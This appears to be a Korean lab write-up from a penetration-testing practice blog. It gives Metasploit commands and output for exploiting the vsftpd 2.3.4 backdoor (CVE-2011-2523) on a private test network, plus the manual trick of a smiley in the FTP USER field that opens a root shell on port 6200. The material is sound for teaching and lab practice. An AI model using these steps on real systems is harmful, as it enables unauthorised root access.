
1. Metasploit에서 vsftpd 2.3.4 공격 환경 구성을 위한 대상 정보 설정
| • msfconsole: Metasploit Framework(MSF)를 실행하는 명령어로 Metasploit은 알려진 취약점(Exploit)을 이용해 취약점이 실제로 악용 가능한지 검증하거나 시스템에 접근을 시도하는 모의해킹 프레임워크 • Metasploit 실행 과정 msfconsole 실행 → Exploit 모듈 선택 → 공격대상(RHOSTS) 설정 → 공격(RUN) → 취약점 악용 가능 여부 확인 |
| • 단계1. sudo msfconsole -q Metasploit Framework를 실행해 모의해킹 환경 진입 • 단계2. use exploit/unix/ftp/vsftpd_234_backdoor vsftpd 2.3.4(CVE-2011-2523) 취약점을 공격하는 Exploit 모듈 선택 및 사용할 Payload 자동 설정 • 단계3. set RHOSTS 192.168.100.20 공격 대상 IP 설정 • 단계4. set LHOST 192.168.100.10 공격자의 IP 설정 • 단계5. set RPORT 2121 공격 대상 서비스의 포트 설정 • 단계6. show options Exploit을 실행하기 전 필수 옵션이 올바르게 실행되었는지 확인 |

2. 공격
- 자동 Exploit
| [*] Started reverse TCP handler on 192.168.100.10:4444 → Target이 연결해 오기를 기다리는 상태 [*] Running automatic check → 공격하기 전에 대상이 취약한지 자동으로 검사하는 과정 FTP banner hints its vulnerable: 220 (vsFTPd 2.3.4) → FTP 배너를 확인한 결과가 반환되어 취약한 버전(vsftpd 2.3.4) 임을 확인 [+] The target appears to be vulnerable. →Metasploit이 "이 서버는 CVE-2011-2523 공격이 가능한 것으로 보인다." 라고 판단 [+] Backdoor has been spawned! → 백도어가 활성화 ‼️백도어 생성은 되었으나 쉘 연결은 되지 않았음 |

- 수동 Exploit
| # 원리: USER 필드에 :) 포함 → 6200번에 셸 바인딩 uid=0(root) gid=0(root) 결과 확인으로 root 쉘 획득 완료 |

'Red, Blue, Target 환경을 통한 해킹 실습' 카테고리의 다른 글
| 공격 3 — SQL Injection (수동 + SQLmap) (0) | 2026.07.07 |
|---|---|
| 공격 2 — FTP 익명 로그인 & WebShell 업로드 (0) | 2026.07.06 |
| 정찰 단계 3 — SMB·SNMP·DNS 열거 (0) | 2026.07.03 |
| 정찰 단계 2 — 웹 애플리케이션 정보 수집 및 취약점 탐색 (0) | 2026.07.03 |
| 정찰 단계 1 — Nmap 고급 스캔 기법 (0) | 2026.07.02 |